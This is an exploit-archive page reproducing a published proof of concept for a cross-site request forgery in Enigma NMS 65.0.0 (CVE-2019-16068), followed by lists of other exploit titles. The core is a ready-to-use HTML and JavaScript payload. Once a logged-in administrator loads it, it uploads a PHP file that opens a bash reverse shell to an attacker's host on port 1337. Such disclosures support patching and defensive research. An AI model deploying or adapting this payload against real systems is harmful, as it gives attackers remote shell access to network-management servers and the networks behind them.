Menu

Search for hundreds of thousands of exploits

"Enigma NMS 65.0.0 - Cross-Site Request Forgery"

Author

mark

Platform

multiple

Release date

2019-09-09

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF)        #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16068                                            #   
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/        -= Enigma CSRF by @xerubus =-       
|   D _]/\ \     -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    

The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.

<html>
  <script>history.pushState('', '', '/')</script>
  <script>
    function submitRequest()
    {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true);
      xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
      xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495");
      xhr.withCredentials = true;

      var body = "-----------------------------208051173310446317141640314495\r\n" + 
        "Content-Disposition: form-data; name=\"action\"\r\n" + 
        "\r\n" + 
        "system_upgrade\r\n" + 
        "-----------------------------208051173310446317141640314495\r\n" + 
        "Content-Disposition: form-data; name=\"action_aux\"\r\n" + 
        "\r\n" + 
        "upload_file_complete\r\n" + 
        "-----------------------------208051173310446317141640314495\r\n" + 
        "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + 
        "Content-Type: application/x-php\r\n" + 
        "\r\n" + 
        "\x3c?php\n" + 
        "\n" + 
        "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + 
        "\n" + 
        "?\x3e\n" + 
        "\r\n" + 
        "-----------------------------208051173310446317141640314495\r\n" + 
        "Content-Disposition: form-data; name=\"upfile_name\"\r\n" + 
        "\r\n" + 
        "evil.php\r\n" + 
        "-----------------------------208051173310446317141640314495--\r\n";

      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
    }
    submitRequest();
    window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
  </script>
  <body onload="submitRequest();" >
  </body>
</html>
Release Date Title Type Platform Author
2019-09-09 "Enigma NMS 65.0.0 - SQL Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - OS Command Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - Cross-Site Request Forgery" webapps multiple mark
2019-09-06 "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution" remote multiple "Justin Wagner"
2019-09-02 "Alkacon OpenCMS 10.5.x - Local File inclusion" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting" webapps multiple Aetsu
2019-08-29 "Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform" dos multiple "Google Security Research"
2019-08-21 "Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities" remote multiple "Pedro Ribeiro"
2019-08-27 "Tableau - XML External Entity" webapps multiple "Jarad Kopf"
2019-08-23 "Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal" webapps multiple MaYaSeVeN
2019-08-21 "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)" webapps multiple "Alyssa Herrera"
2019-08-21 "LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)" remote multiple LoadLow
2019-08-01 "SilverSHielD 6.x - Local Privilege Escalation" local multiple "Ian Bredemeyer"
2019-08-15 "NSKeyedUnarchiver - Info Leak in Decoding SGBigUTF8String" dos multiple "Google Security Research"
2019-08-12 "ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "WebKit - UXSS via XSLT and Nested Document Replacements" dos multiple "Google Security Research"
2019-08-08 "Aptana Jaxer 1.0.3.4547 - Local File inclusion" webapps multiple "Steph Jensen"
2019-08-07 "Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability" dos multiple "Google Security Research"
2019-08-05 "ARMBot Botnet - Arbitrary Code Execution" remote multiple prsecurity
2019-08-01 "Ultimate Loan Manager 2.0 - Cross-Site Scripting" webapps multiple "Metin Yunus Kandemir"
2019-07-31 "Oracle Hyperion Planning 11.1.2.3 - XML External Entity" webapps multiple "Lucas Dinucci"
2019-07-30 "iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects" dos multiple "Google Security Research"
2019-07-30 "iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1" dos multiple "Google Security Research"
2019-07-30 "iMessage - NSArray Deserialization can Invoke Subclass that does not Retain References" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS NSKeyedUnarchiver - Use-After-Free of ObjC Objects when Unarchiving OITSUIntDictionary Instances" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-09-09 "Enigma NMS 65.0.0 - SQL Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - OS Command Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - Cross-Site Request Forgery" webapps multiple mark
2007-03-21 "KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning" remote linux mark
2007-03-21 "Opera 9.x - FTP PASV Port-Scanning" remote linux mark
2007-03-21 "Mozilla FireFox 1.5.x/2.0 - FTP PASV Port-Scanning" remote linux mark
2007-03-05 "KDE Konqueror 3.5 - JavaScript IFrame Denial of Service" dos linux mark
2007-03-05 "Konqueror 3.5.5 - JavaScript Read of FTP Iframe Denial of Service" dos linux mark
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47363/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47363/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47363/41718/enigma-nms-6500-cross-site-request-forgery/download/", "exploit_id": "47363", "exploit_description": "\"Enigma NMS 65.0.0 - Cross-Site Request Forgery\"", "exploit_date": "2019-09-09", "exploit_author": "mark", "exploit_type": "webapps", "exploit_platform": "multiple", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse